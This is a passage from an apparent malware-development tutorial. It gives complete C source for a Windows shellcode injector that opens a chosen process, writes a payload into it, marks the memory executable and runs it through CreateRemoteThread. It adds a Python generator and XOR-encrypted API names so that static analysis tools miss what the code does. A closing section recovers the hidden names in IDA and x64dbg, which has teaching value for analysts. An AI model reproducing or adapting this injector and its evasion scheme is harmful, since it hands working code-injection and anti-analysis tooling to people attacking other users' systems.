          0LL);
  return v19 == 0;
}

In general, by looking through the pseudocode you can still infer what the executable is doing, mainly because the API names are still passed to GetProcAddress as plaintext strings, which lets IDA label each resolved function pointer with the API it points to.

Encrypting the WinAPI Strings - encrypted-apis.c

To further apply anti-analysis techniques to the process injection program, we’ll XOR encrypt suspicious strings, such as the names of any modules we load and the APIs we resolve using GetProcAddress. To encrypt the strings, I used the following Python 3 program, which reads all strings from a file xor-list.txt, generates a random one-byte key, XOR encrypts each string (including its null terminator), and outputs the resulting encrypted bytes as C arrays:

import random

def generate_xor_key():
    return random.getrandbits( 8 )

def xor_encrypt( data, key ):
    data += b'\0' 
    return bytes( [b ^ key for b in data] )

def format_variable_name( name ):
    if '.' in name:
        name = name.replace( '.', '_' )
    return name + '_encrypted'

def main():
    key = generate_xor_key()

    with open( 'xor-list.txt', 'r' ) as file:
        api_names = file.readlines()

    for api_name in api_names:
        api_name = api_name.strip()  
        api_name_bytes = api_name.encode()

        encrypted_api_name = xor_encrypt( api_name_bytes, key )
        c_formatted_encrypted = ', '.join( f'0x{b:02x}' for b in encrypted_api_name )
        c_formatted_key = f'0x{key:02x}'

        variable_name = format_variable_name( api_name )
        
        print( f"unsigned char {variable_name}[] = {{{c_formatted_encrypted}}};\n" )

    print( f"unsigned char key = {c_formatted_key};" ) 

if __name__ == '__main__':
    main()

Example output:

unsigned char user32_dll_encrypted[] = {0xac, 0xaa, 0xbc, 0xab, 0xea, 0xeb, 0xf7, 0xbd, 0xb5, 0xb5, 0xd9};

unsigned char MessageBoxA_encrypted[] = {0x94, 0xbc, 0xaa, 0xaa, 0xb8, 0xbe, 0xbc, 0x9b, 0xb6, 0xa1, 0x98, 0xd9};

unsigned char key = 0xd9;

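The following C XOR decryption function is used. It XOR decrypts the given byte array in place, given the array and its length. The key is hardcoded, so it must match the key printed by the script for that run (0x70 in the examples that follow, rather than the 0xd9 from the sample output above):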

void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x70;

    for( int i = 0; i < data_len; i++ )
    {
        data[i] ^= key;
    }
}
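This works because XOR is its own inverse: applying the same key a second time restores the original bytes. The sketch below shows the round trip with the key passed as a parameter rather than hardcoded. xor_buffer is a hypothetical variant written for illustration, not the function used in the project.

```c
#include <stddef.h>

/*
 * XOR every byte of data with key, in place.
 * Calling it twice with the same key restores the original contents.
 */
void xor_buffer( unsigned char *data, size_t data_len, unsigned char key )
{
    for( size_t i = 0; i < data_len; i++ )
    {
        data[i] ^= key;
    }
}
```

For example, running xor_buffer over the 11 bytes of "user32.dll" (terminator included) with key 0x70 turns the first byte 'u' (0x75) into 0x05 and the terminating 0x00 into 0x70, matching the encrypted array used in the example that follows. A second call with the same key yields "user32.dll" again.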

Putting it together in a simple example, we can XOR encrypt the user32.dll string and the MessageBoxA string, and before we use those strings we decrypt them in memory:

#include <stdio.h>
#include <string.h>
#include <windows.h>

//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x70;

    for( int i = 0; i < data_len; i++ )
    {
        data[i] ^= key;
    }
}

int main() 
{
    unsigned char user32_dll_encrypted[] = {0x05, 0x03, 0x15, 0x02, 0x43, 0x42, 0x5e, 0x14, 0x1c, 0x1c, 0x70};
    unsigned char MessageBoxA_encrypted[] = {0x3d, 0x15, 0x03, 0x03, 0x11, 0x17, 0x15, 0x32, 0x1f, 0x08, 0x31, 0x70};

    xor_decrypt( user32_dll_encrypted, sizeof(user32_dll_encrypted) );
    
    HMODULE user32_handle = LoadLibraryA( (LPCSTR)user32_dll_encrypted );
    
    if( NULL == user32_handle )
    {
        DWORD dwError = GetLastError();
        return 1;
    }

    // MessageBoxA takes ANSI strings, so the string parameters are LPCSTR
    int( WINAPI * _MessageBox )
    (
        HWND   hWnd,
        LPCSTR lpText,
        LPCSTR lpCaption,
        UINT   uType    
    );

    xor_decrypt( MessageBoxA_encrypted, sizeof(MessageBoxA_encrypted) );

    _MessageBox = ( int (WINAPI *)
    (
        HWND   hWnd,
        LPCSTR lpText,
        LPCSTR lpCaption,
        UINT   uType    
    )) GetProcAddress( user32_handle, (LPCSTR)MessageBoxA_encrypted );
    
    if( NULL == _MessageBox )
    {
        // printf( "Could not initialize _MessageBox!\n" );
        return 1;
    }

    _MessageBox( NULL, "wowowow!", "boo!", MB_OK );

    return 0;
}

After compiling and opening it in IDA, the user32.dll and MessageBoxA strings no longer appear, and the generated pseudocode can no longer name the function being called through the resolved pointer. The message box call from the above program looks like this in IDA’s pseudocode:

((void (__fastcall *)(_QWORD, char *, char *, _QWORD))ProcAddress)(0LL, aWowooww, aBoo, 0LL);

Compared to the previous section’s program, where IDA could still tell which function was being called through the resolved pointer, this program is more obfuscated. We can apply the same logic to the rest of the strings, such as kernel32.dll and the remaining API names. Below is xor-list.txt, the list of strings I want to encrypt:

kernel32.dll
user32.dll
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
VirtualAllocEx
WriteProcessMemory
VirtualProtectEx
CreateRemoteThread

An example of applying an XOR encrypted string to the VirtualAllocEx API is shown below. Before resolving the API, we define its name as an encrypted byte array (VirtualAllocEx_encrypted) and decrypt it in place, then pass the decrypted array to GetProcAddress.

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
    xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

Repeating this process for every API and module name listed above keeps those names out of the strings list, and because the APIs are resolved at runtime they stay out of the IAT as well, which makes static analysis slightly harder overall (shown in the next section). Here is the finalized code with all the module/API strings XOR encrypted:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"

//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x57;

	for( int i = 0; i < data_len; i++ )
	{
		data[i] ^= key;
	}
}

int main( int argc, char* argv[] )
{
    if( argc < 2 )
    {
        return 1;
    }

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    DWORD process_id = atoi( argv[1] );

    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    unsigned char kernel32_dll_encrypted[] = { 0x3c, 0x32, 0x25, 0x39, 0x32, 0x3b, 0x64, 0x65, 0x79, 0x33, 0x3b, 0x3b, 0x57 };
    xor_decrypt( kernel32_dll_encrypted, sizeof(kernel32_dll_encrypted) );
    HMODULE kernel32_dll_handle = LoadLibraryA( kernel32_dll_encrypted );
    
    if( NULL == kernel32_dll_handle )
    {
        // printf( "Could not load kernel32.dll!\n" );
        return 1;
    }
    
    unsigned char CreateToolhelp32Snapshot_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x03, 0x38, 0x38, 0x3b, 0x3f, 0x32, 0x3b, 0x27, 0x64, 0x65, 0x04, 0x39, 0x36, 0x27, 0x24, 0x3f, 0x38, 0x23, 0x57 };
    xor_decrypt( CreateToolhelp32Snapshot_encrypted, sizeof(CreateToolhelp32Snapshot_encrypted) );

    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, CreateToolhelp32Snapshot_encrypted );

    if( NULL == _CreateToolhelp32Snapshot )
    {
        // printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( NULL == process_snapshot )
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    
    unsigned char Process32First_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x11, 0x3e, 0x25, 0x24, 0x23, 0x57 };
    xor_decrypt( Process32First_encrypted, sizeof(Process32First_encrypted) );
    
    BOOL( WINAPI * _Process32First)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe   
    );

    _Process32First = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe     
    )) GetProcAddress( kernel32_dll_handle, Process32First_encrypted );

    if( NULL == _Process32First )
    {
        // printf( "Could not resolve Process32First!\n" );
        return 1;
    }
    
    _Process32First( process_snapshot, &current_process );

    BOOL( WINAPI * _Process32Next)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe 
    );

    unsigned char Process32Next_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x19, 0x32, 0x2f, 0x23, 0x57 };
    xor_decrypt( Process32Next_encrypted, sizeof(Process32Next_encrypted) );

    _Process32Next = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe    
    )) GetProcAddress( kernel32_dll_handle, Process32Next_encrypted );

    if( NULL == _Process32Next )
    {
        // printf( "Could not resolve Process32Next!\n" );
        return 1;
    }

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            unsigned char OpenProcess_encrypted[] = { 0x18, 0x27, 0x32, 0x39, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x57 };
            xor_decrypt( OpenProcess_encrypted, sizeof(OpenProcess_encrypted) );

            HANDLE( WINAPI * _OpenProcess )
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId            
            );

            _OpenProcess = ( HANDLE (WINAPI *)
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId             
            )) GetProcAddress( kernel32_dll_handle, OpenProcess_encrypted );

            if( NULL == _OpenProcess )
            {
                // printf( "Could not resolve OpenProcess!\n" );
                return 1;
            }

            target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( _Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        return 1;
    }

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
    xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

    // printf( "[+] Successfully allocated memory!\n" );

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    unsigned char WriteProcessMemory_encrypted[] = { 0x00, 0x25, 0x3e, 0x23, 0x32, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x1a, 0x32, 0x3a, 0x38, 0x25, 0x2e, 0x57 };
    xor_decrypt( WriteProcessMemory_encrypted, sizeof(WriteProcessMemory_encrypted) );

    BOOL( WINAPI * _WriteProcessMemory )
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten    
    );

    _WriteProcessMemory = ( BOOL(WINAPI *)
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten     
    )) GetProcAddress( kernel32_dll_handle, WriteProcessMemory_encrypted );

    if( NULL == _WriteProcessMemory )
    {
        // printf( "Could not resolve WriteProcessMemory!\n" );
        return 1;
    }

    return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = 0;

    unsigned char VirtualProtectEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x07, 0x25, 0x38, 0x23, 0x32, 0x34, 0x23, 0x12, 0x2f, 0x57 };
    xor_decrypt( VirtualProtectEx_encrypted, sizeof(VirtualProtectEx_encrypted) ); 

    BOOL( WINAPI * _VirtualProtectEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
    );

    _VirtualProtectEx = ( BOOL(WINAPI *)
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect   
    )) GetProcAddress( kernel32_dll_handle, VirtualProtectEx_encrypted );

    if( NULL == _VirtualProtectEx )
    {
        // printf( "Could not resolve VirtualProtectEx!\n" );
        return 0;
    }

    return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

    //
    // EXECUTE SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    unsigned char CreateRemoteThread_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x05, 0x32, 0x3a, 0x38, 0x23, 0x32, 0x03, 0x3f, 0x25, 0x32, 0x36, 0x33, 0x57 };
    xor_decrypt( CreateRemoteThread_encrypted, sizeof(CreateRemoteThread_encrypted) );

    HANDLE( WINAPI * _CreateRemoteThread )
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId   
    );

    _CreateRemoteThread = ( HANDLE(WINAPI *)
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId    
    )) GetProcAddress( kernel32_dll_handle, CreateRemoteThread_encrypted );

    if( NULL == _CreateRemoteThread )
    {
        // printf( "Could not resolve CreateRemoteThread!\n" );
        return 1;
    }

    handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }    

    return 0;
}

Static Analysis of encrypted-apis.exe

To start off, looking at the IAT and the strings table within IDA gives no solid indication of what the program does. Two interesting APIs still show up in the IAT, LoadLibraryA and GetProcAddress, but the strings table does not immediately reveal how they are used. Shown below is the pseudocode that IDA generated.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE hModule; // [rsp+48h] [rbp-270h]
  __int64 v5; // [rsp+50h] [rbp-268h]
  __int64 v6; // [rsp+58h] [rbp-260h]
  HANDLE hObject; // [rsp+60h] [rbp-258h]
  int v8; // [rsp+68h] [rbp-250h]
  int v9; // [rsp+6Ch] [rbp-24Ch] BYREF
  __int64 v10; // [rsp+70h] [rbp-248h]
  FARPROC ProcAddress; // [rsp+78h] [rbp-240h]
  FARPROC v12; // [rsp+80h] [rbp-238h]
  FARPROC v13; // [rsp+88h] [rbp-230h]
  FARPROC v14; // [rsp+90h] [rbp-228h]
  FARPROC v15; // [rsp+98h] [rbp-220h]
  FARPROC v16; // [rsp+A0h] [rbp-218h]
  FARPROC v17; // [rsp+A8h] [rbp-210h]
  FARPROC v18; // [rsp+B0h] [rbp-208h]
  __int64 v19; // [rsp+B8h] [rbp-200h]
  int v20; // [rsp+C0h] [rbp-1F8h] BYREF
  unsigned int v21; // [rsp+C8h] [rbp-1F0h]
  CHAR v22; // [rsp+1F0h] [rbp-C8h] BYREF
  char v23[11]; // [rsp+1F1h] [rbp-C7h] BYREF
  CHAR LibFileName[16]; // [rsp+200h] [rbp-B8h] BYREF
  CHAR v25[10]; // [rsp+210h] [rbp-A8h] BYREF
  char v26[4]; // [rsp+21Ah] [rbp-9Eh] BYREF
  CHAR v27[10]; // [rsp+220h] [rbp-98h] BYREF
  char v28[5]; // [rsp+22Ah] [rbp-8Eh] BYREF
  CHAR v29[13]; // [rsp+230h] [rbp-88h] BYREF
  char v30[2]; // [rsp+23Dh] [rbp-7Bh] BYREF
  CHAR v31[15]; // [rsp+240h] [rbp-78h] BYREF
  char v32[2]; // [rsp+24Fh] [rbp-69h] BYREF
  CHAR v33[13]; // [rsp+258h] [rbp-60h] BYREF
  char v34[6]; // [rsp+265h] [rbp-53h] BYREF
  CHAR v35[13]; // [rsp+270h] [rbp-48h] BYREF
  char v36[6]; // [rsp+27Dh] [rbp-3Bh] BYREF
  CHAR ProcName[17]; // [rsp+288h] [rbp-30h] BYREF
  char v38[8]; // [rsp+299h] [rbp-1Fh] BYREF

  if ( argc < 2 )
    return 1;
  v5 = 0LL;
  v8 = unknown_libname_19(argv[1], argv, envp);
  qmemcpy(LibFileName, "<2%92;dey3;;W", 13);
  sub_140001000((__int64)LibFileName, 0xDu);
  hModule = LoadLibraryA(LibFileName);
  if ( !hModule )
    return 1;
  ProcName[0] = 20;
  ProcName[1] = 37;
  ProcName[2] = 50;
  ProcName[3] = 54;
  ProcName[4] = 35;
  ProcName[5] = 50;
  ProcName[6] = 3;
  ProcName[7] = 56;
  ProcName[8] = 56;
  ProcName[9] = 59;
  ProcName[10] = 63;
  ProcName[11] = 50;
  ProcName[12] = 59;
  ProcName[13] = 39;
  ProcName[14] = 100;
  ProcName[15] = 101;
  ProcName[16] = 4;
  qmemcpy(v38, "96'$?8#W", sizeof(v38));
  sub_140001000((__int64)ProcName, 0x19u);
  ProcAddress = GetProcAddress(hModule, ProcName);
  if ( !ProcAddress )
    return 1;
  hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))ProcAddress)(2LL, 0LL);
  if ( !hObject )
    return 1;
  v20 = 304;
  v27[0] = 7;
  v27[1] = 37;
  v27[2] = 56;
  v27[3] = 52;
  v27[4] = 50;
  v27[5] = 36;
  v27[6] = 36;
  v27[7] = 100;
  v27[8] = 101;
  v27[9] = 17;
  qmemcpy(v28, ">%$#W", sizeof(v28));
  sub_140001000((__int64)v27, 15u);
  v12 = GetProcAddress(hModule, v27);
  if ( !v12 )
    return 1;
  ((void (__fastcall *)(HANDLE, int *))v12)(hObject, &v20);
  v25[0] = 7;
  v25[1] = 37;
  v25[2] = 56;
  v25[3] = 52;
  v25[4] = 50;
  v25[5] = 36;
  v25[6] = 36;
  v25[7] = 100;
  v25[8] = 101;
  v25[9] = 25;
  qmemcpy(v26, "2/#W", sizeof(v26));
  sub_140001000((__int64)v25, 0xEu);
  v14 = GetProcAddress(hModule, v25);
  if ( !v14 )
    return 1;
  while ( v8 != v21 )
  {
    if ( !((unsigned int (__fastcall *)(HANDLE, int *))v14)(hObject, &v20) )
      goto LABEL_18;
  }
  v22 = 24;
  qmemcpy(v23, "'29\a%842$$W", sizeof(v23));
  sub_140001000((__int64)&v22, 0xCu);
  v13 = GetProcAddress(hModule, &v22);
  if ( !v13 )
    return 1;
  v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))v13)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
  CloseHandle(hObject);
  if ( !v5 )
    return 1;
  v10 = 3072LL;
  v29[0] = 1;
  v29[1] = 62;
  v29[2] = 37;
  v29[3] = 35;
  v29[4] = 34;
  v29[5] = 54;
  v29[6] = 59;
  v29[7] = 22;
  v29[8] = 59;
  v29[9] = 59;
  v29[10] = 56;
  v29[11] = 52;
  v29[12] = 18;
  qmemcpy(v30, "/W", sizeof(v30));
  sub_140001000((__int64)v29, 0xFu);
  v15 = GetProcAddress(hModule, v29);
  if ( !v15 )
    return 1;
  v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))v15)(v5, 0LL, v10, 12288LL, 4);
  if ( !v6 )
    return 1;
  v33[0] = 0;
  v33[1] = 37;
  v33[2] = 62;
  v33[3] = 35;
  v33[4] = 50;
  v33[5] = 7;
  v33[6] = 37;
  v33[7] = 56;
  v33[8] = 52;
  v33[9] = 50;
  v33[10] = 36;
  v33[11] = 36;
  v33[12] = 26;
  qmemcpy(v34, "2:8%.W", sizeof(v34));
  sub_140001000((__int64)v33, 0x13u);
  v16 = GetProcAddress(hModule, v33);
  if ( !v16 )
    return 1;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))v16)(v5, v6, &unk_14001C000, v10, 0LL) )
    return 1;
  v9 = 0;
  v31[0] = 1;
  v31[1] = 62;
  v31[2] = 37;
  v31[3] = 35;
  v31[4] = 34;
  v31[5] = 54;
  v31[6] = 59;
  v31[7] = 7;
  v31[8] = 37;
  v31[9] = 56;
  v31[10] = 35;
  v31[11] = 50;
  v31[12] = 52;
  v31[13] = 35;
  v31[14] = 18;
  qmemcpy(v32, "/W", sizeof(v32));
  sub_140001000((__int64)v31, 0x11u);
  v17 = GetProcAddress(hModule, v31);
  if ( !v17 )
    return 0;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))v17)(v5, v6, v10, 64LL, &v9) )
    return 1;
  v19 = 0LL;
  v35[0] = 20;
  v35[1] = 37;
  v35[2] = 50;
  v35[3] = 54;
  v35[4] = 35;
  v35[5] = 50;
  v35[6] = 5;
  v35[7] = 50;
  v35[8] = 58;
  v35[9] = 56;
  v35[10] = 35;
  v35[11] = 50;
  v35[12] = 3;
  qmemcpy(v36, "?%263W", sizeof(v36));
  sub_140001000((__int64)v35, 0x13u);
  v18 = GetProcAddress(hModule, v35);
  if ( !v18 )
    return 1;
  v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))v18)(
          v5,
          0LL,
          0LL,
          v6,
          0LL,
          0,
          0LL);
  return v19 == 0;
}

In the generated pseudocode, we can see a general pattern:

  1. The program defines some sort of string
  2. sub_140001000 is called with that string and an integer as the arguments
  3. GetProcAddress is called with the same string that was passed to sub_140001000, and the returned address is saved to a variable
  4. The variable from the third step is cast to a function pointer type with some sort of function signature
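
One detail in the pseudocode hints at the scheme before we even open sub_140001000: every string blob ends in the same byte, 'W' (0x57). If the strings are NUL-terminated and XORed with a single-byte key, that final byte would be the key itself. Below is a minimal sketch of that guess, assuming single-byte XOR; the helper name candidate_keys is hypothetical and the blob is the LibFileName value from the pseudocode.

```python
import string

# Printable ASCII without the control-style whitespace characters
PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")

def candidate_keys(blob: bytes) -> list:
    """Return single-byte keys that decode blob to printable text plus a NUL."""
    keys = []
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if plain[-1] == 0 and all(c in PRINTABLE for c in plain[:-1]):
            keys.append(key)
    return keys

lib_file_name = b"<2%92;dey3;;W"   # copied from the qmemcpy into LibFileName
print([hex(k) for k in candidate_keys(lib_file_name)])  # ['0x57']
```

This is only a heuristic. It confirms nothing on its own, but it tells us which constant to look for when reading the routine.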

Looking into what sub_140001000 does:

__int64 __fastcall sub_140001000(__int64 a1, unsigned int a2)
{
  __int64 result; // rax
  int i; // [rsp+4h] [rbp-14h]

  for ( i = 0; ; ++i )
  {
    result = a2;
    if ( i >= (int)a2 )
      break;
    *(_BYTE *)(a1 + i) ^= 0x57u;
  }
  return result;
}

First, IDA types the first argument as a 64-bit integer rather than as a pointer to a string. To fix the function signature, we can use Set item type so that the first argument is passed in as a char * (a string). Doing so updates the pseudocode like so:

__int64 __fastcall sub_140001000(char *a1, unsigned int a2)
{
  __int64 result; // rax
  signed int i; // [rsp+4h] [rbp-14h]

  for ( i = 0; ; ++i )
  {
    result = a2;
    if ( i >= (int)a2 )
      break;
    a1[i] ^= 0x57u;
  }
  return result;
}

From this, we can see that the for loop increments i by one until it reaches a2 (which we assume is the length), XORing each character of the string with 0x57 along the way. To attempt to decrypt one of the strings, I took ProcName from the pseudocode and first converted its values to hexadecimal:

  ProcName[0] = 0x14;
  ProcName[1] = 0x25;
  ProcName[2] = 0x32;
  ProcName[3] = 0x36;
  ProcName[4] = 0x23;
  ProcName[5] = 0x32;
  ProcName[6] = 3;
  ProcName[7] = 0x38;
  ProcName[8] = 0x38;
  ProcName[9] = 0x3B;
  ProcName[10] = 0x3F;
  ProcName[11] = 0x32;
  ProcName[12] = 0x3B;
  ProcName[13] = 0x27;
  ProcName[14] = 0x64;
  ProcName[15] = 0x65;
  ProcName[16] = 4;
  qmemcpy(v38, "96'$?8#W", sizeof(v38));
  sub_140001000(ProcName, 25u);
  ProcAddress = GetProcAddress(hModule, ProcName);

Looking at the decompilation view in IDA, we can see the rest of the hex values being written into the string:

image.png

I wrote a python3 program string-dec.py to XOR the bytes with the key, convert them to a string, and print the result. Here is the program and its output:

# define byte string (the encrypted bytes recovered from IDA)
enc_string = b'\x14\x25\x32\x36\x23\x32\x03\x38\x38\x3b\x3f\x32\x3b\x27\x64\x65\x04\x39\x36\x27\x24\x3f\x38\x23\x57'

xor_key = b'\x57' 

plaintext = []

for byte in enc_string:
    xor_byte = byte ^ xor_key[0]
    plaintext.append( xor_byte )

byte_string = bytes( plaintext )

# the final byte decrypts to the NUL terminator, so strip it before printing
resulting_string = byte_string.decode('utf-8').rstrip('\x00')

print( resulting_string )

> python3 string-dec.py

CreateToolhelp32Snapshot

This shows that the encrypted API name is CreateToolhelp32Snapshot. Following the same procedure for the other strings reveals every API being resolved with GetProcAddress.
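
Repeating that by hand for every string gets tedious, so the same idea can be batched. The sketch below is an illustration rather than one of the project scripts: the names decode and recovered are hypothetical, and the values are copied from a few of the pseudocode blocks above (the individual byte assignments followed by the qmemcpy string).

```python
KEY = 0x57  # constant from the XOR loop in sub_140001000

def decode(prefix, tail=""):
    """Join the byte assignments and the qmemcpy string, XOR with KEY,
    and drop the trailing NUL terminator."""
    blob = bytes(prefix) + tail.encode("latin-1")
    return bytes(b ^ KEY for b in blob).rstrip(b"\x00").decode("ascii")

# IDA variable name -> (byte assignments, qmemcpy string)
recovered = {
    "LibFileName": ([], "<2%92;dey3;;W"),
    "v27": ([7, 37, 56, 52, 50, 36, 36, 100, 101, 17], ">%$#W"),
    "v25": ([7, 37, 56, 52, 50, 36, 36, 100, 101, 25], "2/#W"),
    "v22": ([24], "'29\a%842$$W"),
    "v29": ([1, 62, 37, 35, 34, 54, 59, 22, 59, 59, 56, 52, 18], "/W"),
}

for name, (prefix, tail) in recovered.items():
    print(f"{name:12} -> {decode(prefix, tail)}")
```

Run as-is, this maps LibFileName to kernel32.dll and the four variables to Process32First, Process32Next, OpenProcess, and VirtualAllocEx; the remaining blobs can be added to the dictionary the same way.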

As an alternative approach, I also did some dynamic analysis using x64dbg. First, load the program into the debugger and make sure to add the PID as an argument: under File > Change Command Line, append the PID after the closing quotation mark of the program path (e.g. "C:\Malware Dev\api-obfuscation\encrypted-apis.exe" 4188). Next, set a breakpoint that triggers every time GetProcAddress is called: go to the Symbols tab, click on kernel32.dll, look for GetProcAddress, then right click it and click Toggle Breakpoint. Now run the program from the top toolbar and it will stop every time the API is called. After going through some of the GetProcAddress calls, we reach the point where the name of the API being resolved shows up in the RDX register. An example is shown below, where CreateToolhelp32Snapshot is being resolved:

image.png

You can see the instruction pointer RIP stopped at the GetProcAddress breakpoint, with CreateToolhelp32Snapshot passed as its second argument in RDX. Clicking the forward arrow at the top continues execution, and the debugger stops again at each GetProcAddress call with the name of the API being resolved in the RDX register. By doing this, we can see the rest of the API names in plaintext and therefore conclude what the program is doing.

Conclusion, Further Possibilities and Considerations

